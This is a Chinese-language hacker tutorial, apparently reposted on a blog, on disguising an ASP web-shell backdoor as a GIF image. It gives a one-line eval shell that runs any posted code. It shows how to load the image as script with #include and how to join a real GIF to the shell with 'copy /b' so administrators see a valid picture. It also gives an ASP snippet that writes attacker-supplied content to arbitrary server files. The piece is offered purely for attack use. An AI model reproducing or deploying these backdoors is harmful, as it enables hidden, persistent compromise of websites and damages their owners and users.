美人計--圖片asp木馬

作者：紅魂浩天   
一個網站裏面除了asp文件，再就數圖片文件最多了，它讓我們的網頁"美麗動人"嘻嘻，但是你有沒有想到過這裏面暗藏的殺機，圖片也可以是asp木馬。

   asp木馬已經出現很長時間了，種類也越來越多，但是說到隱蔽性，我們紅魂老大寫的--冰狐浪子asp
後門還是我眾馬中的首選，現在我們就把它作成圖片asp木馬。

首先我們把冰狐浪子asp木馬服務端直接該后綴名為gif，記得用容錯格式：

<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>

一、include給我們指路

接下來要使用include指令，這個指令也是我們常常看到的，但是它有一個很特別的功能，可能你就沒有用到過了。這就是可以調用位于其它文件中的函數，不管它的后綴名是什么，哪怕是個圖片文件。

然后我們新建一個asp文件，在里面寫入<!--#include file="asp.gif"-->，當然你也可以把它插入到任何asp文件的頭部或者尾部，僅僅就這一句話。asp.gif就是冰狐浪子asp木馬服務端，也是一句話，這個圖片asp木馬就做好了。

不過這里還有一個小問題，雖然網站里圖片很多，但如果管理員不小心打開這個圖片，在IE上顯示的是一把小紅叉，他會怎么想呢?

為了不讓人懷疑，要讓我們的圖片美人動起來，讓它成為真正的gif文件！

二、copy給我們加油

把asp.gif改名為asp.asp，然后去找個圖片來，至于什么內容的圖片，就看你自己的愛好啦，不過最好不要超過20kb，大了執行的速度就慢，把它保存為1.gif。

再啟動windows下的dos窗口，鍵入copy 1.gif /b + asp.asp /a asp.gif

其中參數/b 是指定以二進制格式復制、合并文件。參數/a 是指定以ascll格式復制、合并文件。這里要注意文件的順序。執行完后就會生成asp.gif，這就是我們的冰狐浪子asp木馬服務端。不過現在它已經偽裝成一個婷婷玉立的美人了，嘿嘿！如果要插入其他asp文件中，請插入下面代碼

<%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
<form method="POST" ACTION="你插入文件的文件名?id=1">
<!--#include file="UploadFile/asp.gif"-->
<% end if %>

這里我們用一個id參數來蔽掉了，圖片所產生的亂碼。

好了在文章最后，還要謝謝LCX 老大和冰狐老大對我的幫助和支持！

 
http://www.cnxhacker.net/online/cs/cs.asp

文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags: 木馬
相關日誌: